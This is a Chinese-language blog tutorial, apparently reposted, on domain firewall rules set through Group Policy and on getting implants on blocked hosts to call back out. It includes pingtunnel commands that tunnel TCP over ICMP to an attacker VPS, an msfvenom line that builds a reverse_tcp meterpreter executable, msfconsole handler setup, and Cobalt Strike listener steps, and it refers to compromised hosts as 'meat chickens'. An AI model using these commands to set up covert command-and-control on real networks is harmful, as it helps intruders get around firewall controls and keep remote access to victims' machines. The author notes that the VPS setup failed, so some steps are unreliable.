解决网络不通讯问题
代理与隧道技术:
代理:
流量转发至跳板机,可以是服务器或者肉鸡,最主要的特征是,无论代理后面挂了几个设备,代理对外只表现为一个设备。
隧道:
是通过特定的通讯方法,直接找到这个目标
reverse_tcp:反向 后门主动连接自己服务器 目标防火墙 出
bind_tcp:正向 自己服务器主动连接后门 目标防火墙 入
单机-防火墙-限制端口出入站
熟悉常见主机配置不出网的方式
1、入站&出站&连接安全
2、域&专用&公网&状态
3、阻止&允许&其他配置
单机-防火墙-限制协议出入站
熟悉常见主机配置不出网的方式
1、程序&端口&预定义&自定义
2、协议&TCP&UDP&ICMP&L2TP等
可以针对具体的协议进行出入站限制
有些破解软件的重要一步就是防止软件与外部网络进行连接,就会将该程序的出入站规则全部禁用。
域控-防火墙-组策略对象同步
熟悉常见主机配置不出网的操作流程
操作:组策略管理-域-创建GPO链接-防火墙设置
更新策略:强制&命令&重启
命令:gpupdate/force
域成员强制同步DC域防火墙策略
域控-防火墙-组策略不出网上线
背景介绍:域控通过组策略设置防火墙规则同步后,域内用户主机被限制TCP出网,其中规则为出站规则,安全研究者通过入站取得SHELL权限,需要对其进行上线控制。
思路:正向连接&隧道技术
如果是入站被限制呢?反向连接&隧道技术也可以解决(前提看限制的多不多)
ICMP协议项目:将TCP协议数据封装成ICMP协议数据 隧道技术
https://github.com/esrrhs/spp
https://github.com/bdamele/icmpsh
https://github.com/esrrhs/pingtunnel
这里我们实验是模拟DC禁用域成员主机TCP 4455端口出网:
实战中有两种方法进行上线:
- 隧道技术:后门走其他协议进行上线
- 流量转发:将数据转发给出网的机器 通过出网机器正向主动控制他
1、CS-ICMP-上线
VPS:
./pingtunnel -type server
肉鸡:(管理器运行)
pingtunnel.exe -type client -l 127.0.0.1:6666 -s 10.10.10.146 -t 10.10.10.146:7777 -tcp 1 -noprint 1 -nolog 1
CS:
监听器1:127.0.0.1 5555
监听器2:10.10.10.146 6666
生成监听器1的Stager后门肉鸡以监听器二上线执行
cs-TCP流量使用pingtunnel封装icmp流量上线
2、MSF上线
生成后门:
注意这里是127.0.0.1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4455 -f exe > msf.exe
MSF启动监听:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploit
Kali开启隧道:
./pingtunnel -type server 需要在目标主机上执行 需要高权限
Win开启隧道 //将本地4455icmp协议数据转发至66ip的4444流量上(管理员运行)
pingtunnel.exe -type client -l 127.0.0.1:4455 -s 47.94.xx.xx -t 47.94.xx.xx:4444 -tcp 1 -noprint 1 -nolog 1
流量是转了过来,但是不知道为什么没有生成会话。
3-13号,使用了本地kali复现成功了,真实vps没有复现成功
msf-TCP流量使用pingtunnel封装成icmp流量文章来源:https://www.toymoban.com/news/detail-763220.html
注意:文章来源地址https://www.toymoban.com/news/detail-763220.html
- 视频中msf-127-4455.exe是流量转发到本地127.0.0.1 4455端口
- pingtunnel在webadmin靶机上需要高权限执行
- 使用的kali ip:10.10.10.146 webadmin 出网ip:10.10.10.151
到了这里,关于【内网安全】 域防火墙&入站出站规则&不出网隧道上线&组策略对象同步的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!